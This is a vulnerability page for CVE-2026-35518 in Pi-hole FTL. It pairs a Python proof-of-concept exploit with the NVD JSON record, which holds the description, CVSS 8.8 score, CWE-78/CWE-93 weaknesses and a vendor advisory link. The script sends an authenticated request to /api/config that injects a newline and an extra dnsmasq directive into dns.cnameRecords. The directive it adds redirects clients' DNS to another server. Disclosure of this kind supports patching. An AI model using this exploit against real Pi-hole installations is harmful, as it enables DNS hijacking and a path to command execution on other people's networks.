CVE-2026-35518

# PoC for CVE-2026-35518: Pi-hole FTL Configuration Injection # Target: Pi-hole FTL < 6.6 import requests import json # Configuration TARGET_URL = "http://<pi-hole-ip>/api/config" SESSION_ID = "<valid_admin_or_low_priv_session_cookie>" # The vulnerability allows injecting newline characters to add arbitrary dnsmasq config. # This payload attempts to inject a malicious configuration directive. # Note: Actual command execution depends on the specific dnsmasq directives used. payload = "legit.cname.example.com=192.168.1.1\ndhcp-option=6,10.0.0.1" headers = { "Content-Type": "application/json", "Cookie": f"PHPSESSID={SESSION_ID}" } # Data structure to update the dns.cnameRecords setting data = { "config": { "dns": { "cnameRecords": payload } } } try: response = requests.post(TARGET_URL, headers=headers, data=json.dumps(data)) if response.status_code == 200: print("[+] Payload sent successfully.") print("[+] Check the dnsmasq configuration file or trigger a config reload to execute.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

{"cve": {"id": "CVE-2026-35518", "sourceIdentifier": "[email protected]", "published": "2026-04-07T16:16:28.243", "lastModified": "2026-04-28T20:35:34.453", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "FTLDNS (pihole-FTL) provides an interactive API and also generates statistics for Pi-hole's Web interface. From 6.0 to before 6.6, the Pi-hole FTL engine contains a Remote Code Execution (RCE) vulnerability in the DNS CNAME records configuration parameter (dns.cnameRecords). This vulnerability allows an authenticated attacker to inject arbitrary dnsmasq configuration directives through newline characters, ultimately achieving command execution on the underlying system. This vulnerability is fixed in 6.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}, {"lang": "en", "value": "CWE-93"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pi-hole:ftldns:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0", "versionEndIncluding": "6.5", "matchCriteriaId": "8C927FF0-74A4-4F13-95A8-E80C5E80F607"}]}]}], "references": [{"url": "https://github.com/pi-hole/FTL/security/advisories/GHSA-28g5-gg88-wh5m", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}